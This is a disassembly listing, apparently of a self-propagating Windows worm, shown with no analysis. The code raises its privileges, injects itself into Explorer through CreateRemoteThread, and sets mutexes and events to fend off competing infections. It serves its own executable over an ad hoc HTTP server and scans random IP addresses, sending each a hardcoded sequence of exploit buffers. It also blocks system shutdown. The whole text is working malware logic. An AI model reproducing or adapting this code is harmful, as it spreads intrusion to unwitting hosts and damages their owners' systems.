push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0A8h
push offset dword_3142460C
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0DEh
push offset dword_314246B8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
cmp eax, 46h
jl loc_31421D4C
cmp [ebp+var_730], 31h
jnz loc_31421BF7
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
push offset byte_314242B8
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31422CE2 ; memcpy
mov eax, dword_31424BBE
add esp, 0Ch
mov [ebp+var_798], eax
loc_31421A98: ; CODE XREF: sub_31421801+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 68h
push offset dword_314247FC
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0A0h
push offset dword_31424868
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
cmp [ebp+arg_0], 0
jz loc_31421CE7
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31424A20
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31422CE2 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_31424A8C
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31422CE2 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31424B00
push eax
call sub_31422CE2 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31421D3F
; ---------------------------------------------------------------------------
loc_31421BF7: ; CODE XREF: sub_31421801+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31422CD6 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31424BF8
push eax
call sub_31422CE2 ; memcpy
push offset byte_314242B8
call sub_31422CDC ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_31424C70
push eax
call sub_31422CE2 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31424BF8
push eax
call sub_31422CE2 ; memcpy
add esp, 40h
push offset byte_314242B8
call sub_31422CDC ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31421C93: ; CODE XREF: sub_31421801+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31421C93
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31422CD6 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31422CD6 ; memset
add esp, 18h
jmp loc_31421A98
; ---------------------------------------------------------------------------
loc_31421CE7: ; CODE XREF: sub_31421801+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_3142490C
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31422CE2 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_3142498C
push eax
call sub_31422CE2 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31421D3F: ; CODE XREF: sub_31421801+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_31421D4C: ; CODE XREF: sub_31421801+1AD�j
; sub_31421801+1E1�j ...
push 2
push [ebp+var_4]
call dword_31421170 ; shutdown
loc_31421D57: ; CODE XREF: sub_31421801+166�j
push [ebp+var_4]
call dword_31421174 ; closesocket
pop esi
loc_31421D61: ; CODE XREF: sub_31421801+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_31421801 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421D68 proc near ; CODE XREF: UPX0:loc_31422376�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_314210A8 ; LoadLibraryA
mov esi, dword_314210A4
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_31421DEC
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_31421DEC
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_31421DEC
lea eax, [ebp+var_C]
push eax
push 20h
call dword_314210A0 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_31421DEC: ; CODE XREF: sub_31421D68+28�j
; sub_31421D68+37�j ...
pop edi
pop esi
leave
retn
sub_31421D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421DF0 proc near ; CODE XREF: UPX0:3142238A�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31425000
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_314210B4 ; GetModuleHandleA
mov esi, dword_314210A4
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31421E37
loc_31421E33: ; CODE XREF: sub_31421DF0+54�j
push 1
jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E37: ; CODE XREF: sub_31421DF0+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_31421E33
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31421110 ; FindWindowA
test eax, eax
jnz short loc_31421E65
call dword_31421114 ; GetForegroundWindow
test eax, eax
jnz short loc_31421E65
push 2
jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E65: ; CODE XREF: sub_31421DF0+65�j
; sub_31421DF0+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31421118 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_314210B0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_31421E8B
push 3
loc_31421E88: ; CODE XREF: sub_31421DF0+45�j
; sub_31421DF0+73�j
pop eax
jmp short loc_31421EF6
; ---------------------------------------------------------------------------
loc_31421E8B: ; CODE XREF: sub_31421DF0+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_3142107C
test eax, eax
jz short loc_31421EE9
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_314210AC ; WriteProcessMemory
push dword_31424FF4
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31421ED5
push eax
call esi ; CloseHandle
jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421ED5: ; CODE XREF: sub_31421DF0+DE�j
push offset aUterm19 ; "uterm19"
call sub_31421F29
pop ecx
mov [ebp+var_4], 5
jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421EE9: ; CODE XREF: sub_31421DF0+B2�j
mov [ebp+var_4], 4
loc_31421EF0: ; CODE XREF: sub_31421DF0+E3�j
; sub_31421DF0+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_31421EF6: ; CODE XREF: sub_31421DF0+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421DF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421EFB proc near ; CODE XREF: sub_314221C4+B�p
; UPX0:3142234C�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_314210B8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_314210EC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421EFB endp
; =============== S U B R O U T I N E =======================================
sub_31421F29 proc near ; CODE XREF: sub_31421DF0+EA�p
; UPX0:31422356�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_314210BC ; CreateMutexA
retn
sub_31421F29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421F38 proc near ; CODE XREF: sub_314223B2+155�p
; sub_314223B2+160�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314210C0 ; CreateThread
pop ebp
retn
sub_31421F38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421F52 proc near ; CODE XREF: sub_314221C4+12C�p
; sub_314225C3+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314210C0 ; CreateThread
push eax
call dword_3142107C ; CloseHandle
pop ebp
retn
sub_31421F52 endp
; =============== S U B R O U T I N E =======================================
sub_31421F73 proc near ; CODE XREF: sub_314211A0+68�p
; sub_31422A9B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31421F9B
loc_31421F84: ; CODE XREF: sub_31421F73+26�j
call dword_314210FC ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31421F84
loc_31421F9B: ; CODE XREF: sub_31421F73+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31421F73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421FA3 proc near ; CODE XREF: sub_314211A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31422CD6 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_314210C4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_3142107C
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31421FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421FF9 proc near ; CODE XREF: sub_3142264B+3E�p
; sub_31422712+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3142114C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_3142201A
call dword_31421150 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_3142201A: ; CODE XREF: sub_31421FF9+15�j
lea eax, [ebp+var_34]
push eax
call dword_31421154 ; gethostbyname
test eax, eax
jnz short loc_3142202F
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_3142202F: ; CODE XREF: sub_31421FF9+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31421FF9 endp
; =============== S U B R O U T I N E =======================================
sub_31422038 proc near ; CODE XREF: sub_314216A2+12�p
; sub_3142255F+22�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31421130 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31422038 endp
; =============== S U B R O U T I N E =======================================
sub_3142204E proc near ; CODE XREF: sub_314223B2+E6�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_314210CC ; OpenEventA
test eax, eax
jz short locret_31422067
push eax
call dword_314210C8 ; SetEvent
locret_31422067: ; CODE XREF: sub_3142204E+10�j
retn
sub_3142204E endp
; =============== S U B R O U T I N E =======================================
sub_31422068 proc near ; CODE XREF: sub_314216A2+68�p
push esi
mov esi, dword_314210FC
push edi
call esi ; rand
mov edi, eax
shl edi, 10h
call esi ; rand
or eax, edi
pop edi
pop esi
retn
sub_31422068 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142207E proc near ; DATA XREF: sub_314221C4+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_314220AF
push 1
jmp loc_3142216A
; ---------------------------------------------------------------------------
loc_314220AF: ; CODE XREF: sub_3142207E+28�j
mov esi, dword_31421104
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_3142217A
lea eax, [ebp+var_100]
push offset dword_314241F0
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_3142217A
mov esi, dword_31421168
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push dword_31424FF0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31422CDC ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_3142212C: ; CODE XREF: sub_3142207E+E8�j
mov eax, dword_31424FF0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_3142213E
mov eax, ecx
loc_3142213E: ; CODE XREF: sub_3142207E+BC�j
test eax, eax
jz short loc_3142216D
push 0
push eax
mov eax, dword_31424FE8
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_31422168
cmp eax, 1000h
jb short loc_3142216D
push 64h
add edi, eax
call dword_31421094 ; Sleep
jmp short loc_3142212C
; ---------------------------------------------------------------------------
loc_31422168: ; CODE XREF: sub_3142207E+D5�j
push 2
loc_3142216A: ; CODE XREF: sub_3142207E+2C�j
pop eax
jmp short loc_314221BD
; ---------------------------------------------------------------------------
loc_3142216D: ; CODE XREF: sub_3142207E+C2�j
; sub_3142207E+DC�j
push offset dword_31424FEC
call dword_314210D4 ; InterlockedIncrement
jmp short loc_31422198
; ---------------------------------------------------------------------------
loc_3142217A: ; CODE XREF: sub_3142207E+49�j
; sub_3142207E+61�j
mov esi, dword_31421168
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_31424D38
push ebx
call esi ; send
loc_31422198: ; CODE XREF: sub_3142207E+FA�j
push 7D0h
call dword_31421094 ; Sleep
push 2
push ebx
call dword_31421170 ; shutdown
push ebx
call dword_31421174 ; closesocket
push 0
call dword_314210D0 ; ExitThread
xor eax, eax
loc_314221BD: ; CODE XREF: sub_3142207E+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_3142207E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314221C4 proc near ; DATA XREF: sub_314223B2+150�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_31421EFB
lea eax, [ebp+var_130]
push 104h
push eax
push offset aCryptographicS ; "Cryptographic Service"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31424FEC, ebx
call sub_31422882
add esp, 14h
test eax, eax
jnz loc_314222F9
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_31421080 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31422230
push 1
call dword_314210D0 ; ExitThread
loc_31422230: ; CODE XREF: sub_314221C4+62�j
push ebx
push esi
call dword_314210DC ; GetFileSize
push eax
mov dword_31424FF0, eax
call sub_31422CA5
pop ecx
mov dword_31424FE8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31424FF0
push eax
push esi
call dword_314210D8 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31424FF0, eax
call dword_3142107C ; CloseHandle
push ebx
push 1
push 2
call dword_31421158 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31422292: ; CODE XREF: sub_314221C4+E5�j
; sub_314221C4+ED�j ...
call dword_314210FC ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_31424FFC, eax
jz short loc_31422292
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31422292
push eax
call dword_31421160 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31421140 ; bind
test eax, eax
jnz short loc_31422292
push 64h
push edi
call dword_31421144 ; listen
mov [ebp+var_8], esi
pop esi
loc_314222DB: ; CODE XREF: sub_314221C4+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31421148 ; accept
push eax
push offset sub_3142207E
call sub_31421F52
pop ecx
pop ecx
jmp short loc_314222DB
; ---------------------------------------------------------------------------
loc_314222F9: ; CODE XREF: sub_314221C4+3D�j
push ebx
call dword_314210D0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_314221C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422308 proc near ; CODE XREF: sub_314223B2:loc_314224FC�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3142113C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_31422308 endp
; ---------------------------------------------------------------------------
loc_31422334: ; CODE XREF: UPX1:31427D08�j
push 0
call dword_314210B4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31425000, eax
call dword_31421074 ; DeleteFileA
call sub_31421EFB
push offset aUterm19 ; "uterm19"
call sub_31421F29
pop ecx
mov dword_31424FF4, eax
call dword_314210E4 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31422376
push 1
call dword_314210E0 ; ExitProcess
loc_31422376: ; CODE XREF: UPX0:3142236C�j
call sub_31421D68
call sub_314229E6
call sub_31422B67
push offset sub_314223B2
call sub_31421DF0
test eax, eax
pop ecx
jz short loc_3142239B
push 0
call sub_314223B2
loc_3142239B: ; CODE XREF: UPX0:31422392�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_3142239E proc near ; CODE XREF: sub_314223B2:loc_31422525�p
; sub_3142255F:loc_31422578�p ...
push 0
push dword_31424FF8
call dword_31421070 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_3142239E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314223B2 proc near ; CODE XREF: UPX0:31422396�p
; DATA XREF: UPX0:31422385�o
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421190
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 64h
push ebx
push esi
push edi
mov [ebp+var_70], offset aU10x ; "u10x"
mov [ebp+var_6C], offset aU11x ; "u11x"
mov [ebp+var_68], offset aU12x ; "u12x"
mov [ebp+var_64], offset aU13x ; "u13x"
mov [ebp+var_60], offset aU14x ; "u14x"
mov [ebp+var_5C], offset aU15x ; "u15x"
mov [ebp+var_58], offset aU16x ; "u16x"
mov [ebp+var_54], offset aU17x ; "u17x"
mov [ebp+var_50], offset aU18x ; "u18x"
mov [ebp+var_4C], offset aU8 ; "u8"
mov [ebp+var_48], offset aU9 ; "u9"
mov [ebp+var_44], offset aU10 ; "u10"
mov [ebp+var_40], offset aU11 ; "u11"
mov [ebp+var_3C], offset aU12 ; "u12"
mov [ebp+var_38], offset aU13 ; "u13"
mov [ebp+var_34], offset aU13i ; "u13i"
mov [ebp+var_30], offset aU14 ; "u14"
mov [ebp+var_2C], offset aU15 ; "u15"
mov [ebp+var_28], offset aU16 ; "u16"
mov [ebp+var_24], offset aU17 ; "u17"
mov [ebp+var_20], offset aU18 ; "u18"
mov [ebp+var_1C], offset aU19 ; "u19"
push offset aU19x ; "u19x"
xor edi, edi
push edi
push 1
push edi
call dword_3142106C ; CreateEventA
mov dword_31424FF8, eax
mov [ebp+var_4], edi
mov [ebp+var_74], edi
loc_3142248B: ; CODE XREF: sub_314223B2+EF�j
cmp [ebp+var_74], 9
jnb short loc_314224A3
mov eax, [ebp+var_74]
push [ebp+eax*4+var_70]
call sub_3142204E
pop ecx
inc [ebp+var_74]
jmp short loc_3142248B
; ---------------------------------------------------------------------------
loc_314224A3: ; CODE XREF: sub_314223B2+DD�j
mov [ebp+var_74], edi
loc_314224A6: ; CODE XREF: sub_314223B2+10A�j
cmp [ebp+var_74], 0Dh
jnb short loc_314224BE
mov eax, [ebp+var_74]
push [ebp+eax*4+var_4C]
call sub_31421F29
pop ecx
inc [ebp+var_74]
jmp short loc_314224A6
; ---------------------------------------------------------------------------
loc_314224BE: ; CODE XREF: sub_314223B2+F8�j
cmp [ebp+arg_0], edi
jz short loc_314224FC
push offset aWs2_32 ; "ws2_32"
mov esi, dword_314210A8
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm19 ; "uterm19"
call sub_31421F29
pop ecx
mov dword_31424FF4, eax
loc_314224FC: ; CODE XREF: sub_314223B2+10F�j
call sub_31422308
push edi
push offset sub_314221C4
call sub_31421F38
push edi
push offset sub_314216A2
call sub_31421F38
push edi
push offset loc_3142276E
call sub_31421F38
add esp, 18h
loc_31422525: ; CODE XREF: sub_314223B2+18E�j
call sub_3142239E
test eax, eax
jnz short loc_31422542
push edi
call dword_31421018 ; AbortSystemShutdownA
push 1388h
call dword_31421094 ; Sleep
jmp short loc_31422525
; ---------------------------------------------------------------------------
loc_31422542: ; CODE XREF: sub_314223B2+17A�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_314223B2 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142255F proc near ; DATA XREF: sub_314225C3+55�o
; sub_3142264B+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_3142256E
push 1
pop eax
jmp short locret_314225BF
; ---------------------------------------------------------------------------
loc_3142256E: ; CODE XREF: sub_3142255F+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_31422578: ; CODE XREF: sub_3142255F+5A�j
call sub_3142239E
test eax, eax
jnz short loc_314225BB
call sub_31422038
test eax, eax
jz short loc_314225BB
cmp [ebp+var_1], bl
jz short loc_314225B4
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_31421801
movzx esi, word_3142500C
pop ecx
call dword_314210FC ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_31421094 ; Sleep
loc_314225B4: ; CODE XREF: sub_3142255F+2E�j
inc bl
cmp bl, 0FFh
jb short loc_31422578
loc_314225BB: ; CODE XREF: sub_3142255F+20�j
; sub_3142255F+29�j
pop esi
xor eax, eax
pop ebx
locret_314225BF: ; CODE XREF: sub_3142255F+D�j
leave
retn 4
sub_3142255F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314225C3 proc near ; DATA XREF: sub_3142264B+7E�o
; UPX0:31422803�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_314225D1
push 1
pop eax
jmp short loc_31422647
; ---------------------------------------------------------------------------
loc_314225D1: ; CODE XREF: sub_314225C3+7�j
push ebx
push esi
push edi
call sub_31421EFB
mov esi, dword_314210FC
xor ebx, ebx
loc_314225E1: ; CODE XREF: sub_314225C3+7D�j
call sub_3142239E
test eax, eax
jnz short loc_31422642
call sub_31422038
test eax, eax
jz short loc_31422642
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31425004
mov byte ptr [ebp+arg_0+3], al
call dword_314210D4 ; InterlockedIncrement
push [ebp+arg_0]
call sub_31421801
test eax, eax
pop ecx
jnz short loc_31422624
